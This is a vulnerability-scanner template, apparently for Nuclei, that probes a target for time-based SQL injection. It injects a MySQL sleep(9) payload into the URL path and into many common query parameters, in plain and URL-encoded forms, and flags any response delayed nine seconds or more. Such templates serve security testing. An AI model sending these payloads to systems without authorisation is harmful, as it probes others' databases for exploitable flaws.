id: time-based-sqli-uri-finder

info:
  name: Time-Based SQL Injection in URI
  description: Test for Time-Based SQL Injection in URI
  author: erickfernandox
  severity: high
  tags: sqlinjection


requests:
  - method: GET
    path:
      - "{{BaseURL}}/0%27XOR(if(now()=sysdate(),sleep(9),0))XOR%27Z/"
      - "{{BaseURL}}/?article_id=0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z&category=0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z&city=0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z&country=0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z&email=0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z&id=0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z&language=0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z&page=0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z&password=0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z&product_id=0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z&search=0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z&state=0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z&user=0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z&username=0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z&zip=0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z"
      - "{{BaseURL}}/?article_id=0%27XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%289%29%2C0%29%29XOR%27Z&category=0%27XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%289%29%2C0%29%29XOR%27Z&city=0%27XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%289%29%2C0%29%29XOR%27Z&country=0%27XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%289%29%2C0%29%29XOR%27Z&email=0%27XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%289%29%2C0%29%29XOR%27Z&id=0%27XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%289%29%2C0%29%29XOR%27Z&language=0%27XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%289%29%2C0%29%29XOR%27Z&page=0%27XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%289%29%2C0%29%29XOR%27Z&password=0%27XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%289%29%2C0%29%29XOR%27Z&product_id=0%27XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%289%29%2C0%29%29XOR%27Z&search=0%27XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%289%29%2C0%29%29XOR%27Z&state=0%27XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%289%29%2C0%29%29XOR%27Z&user=0%27XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%289%29%2C0%29%29XOR%27Z&username=0%27XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%289%29%2C0%29%29XOR%27Z&zip=0%27XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%289%29%2C0%29%29XOR%27Z"
      
    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - 'duration>=9'
